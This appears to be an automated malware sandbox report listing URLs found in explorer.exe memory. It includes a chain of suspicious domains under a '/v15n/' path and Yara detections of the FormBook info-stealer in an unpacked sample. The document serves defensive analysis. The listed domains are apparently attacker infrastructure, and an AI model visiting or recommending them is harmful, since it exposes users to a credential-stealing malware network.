              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brunoduarte.online/v15n/www.kedai168ef.com
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brunoduarte.onlineReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bt365851.com
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bt365851.com/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bt365851.comReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creativelyloud.com
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creativelyloud.com/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creativelyloud.com/v15n/www.kurainu.xyz
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creativelyloud.comReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fwbsmg.life
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fwbsmg.life/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fwbsmg.life/v15n/www.brunoduarte.online
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fwbsmg.lifeReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gtur.top
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gtur.top/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gtur.top/v15n/www.fwbsmg.life
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gtur.topReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hacks.digital
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hacks.digital/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hacks.digital/v15n/www.creativelyloud.com
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hacks.digitalReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kedai168ef.com
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kedai168ef.com/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kedai168ef.com/v15n/www.bt365851.com
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kedai168ef.comReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kurainu.xyz
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kurainu.xyz/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kurainu.xyz/v15n/www.y7rak9.com
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kurainu.xyzReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lawyers-br-pt-9390663.fyi
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lawyers-br-pt-9390663.fyi/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lawyers-br-pt-9390663.fyi/v15n/www.boostgrowmode.com
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lawyers-br-pt-9390663.fyiReferer:
              Source: explorer.exe, 00000004.00000002.3827556743.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076522967.0000000009237000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mirotcg.info
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mirotcg.info/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mirotcg.info/v15n/www.mxrkpkngishbdss.xyz
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mirotcg.infoReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mxrkpkngishbdss.xyz
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mxrkpkngishbdss.xyz/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mxrkpkngishbdss.xyz/v15n/www.lawyers-br-pt-9390663.fyi
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mxrkpkngishbdss.xyzReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv.xyz
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv.xyz/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv.xyz/v15n/www.mirotcg.info
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv.xyzReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.syedlatief.com
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.syedlatief.com/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.syedlatief.com/v15n/www.gtur.top
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.syedlatief.comReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wordcraftart.fun
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wordcraftart.fun/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wordcraftart.fun/v15n/www.suv.xyz
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wordcraftart.funReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y7rak9.com
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y7rak9.com/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y7rak9.com/v15n/www.wordcraftart.fun
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y7rak9.comReferer:
              Source: explorer.exe, 00000004.00000002.3833528004.000000000BCC2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BCB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285667724.000000000BCBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
              Source: explorer.exe, 00000004.00000002.3833528004.000000000BCC2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BCB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285667724.000000000BCBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
              Source: explorer.exe, 00000004.00000002.3833528004.000000000BCC2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BCB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285667724.000000000BCBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSA4
              Source: explorer.exe, 00000004.00000002.3833528004.000000000BCC2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BCB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285667724.000000000BCBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
              Source: explorer.exe, 00000004.00000003.2285362723.000000000704B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3824583001.000000000704E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
              Source: explorer.exe, 00000004.00000002.3823977280.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: explorer.exe, 00000004.00000002.3826801349.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
              Source: explorer.exe, 00000004.00000000.1397007516.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3826801349.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
              Source: explorer.exe, 00000004.00000000.1397007516.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3826801349.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
              Source: explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
              Source: explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
              Source: explorer.exe, 00000004.00000002.3832766663.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
              Source: explorer.exe, 00000004.00000002.3832766663.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
              Source: explorer.exe, 00000004.00000002.3832766663.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comer
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
              Source: explorer.exe, 00000004.00000000.1406109687.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
              Source: explorer.exe, 00000004.00000002.3832766663.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com48
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
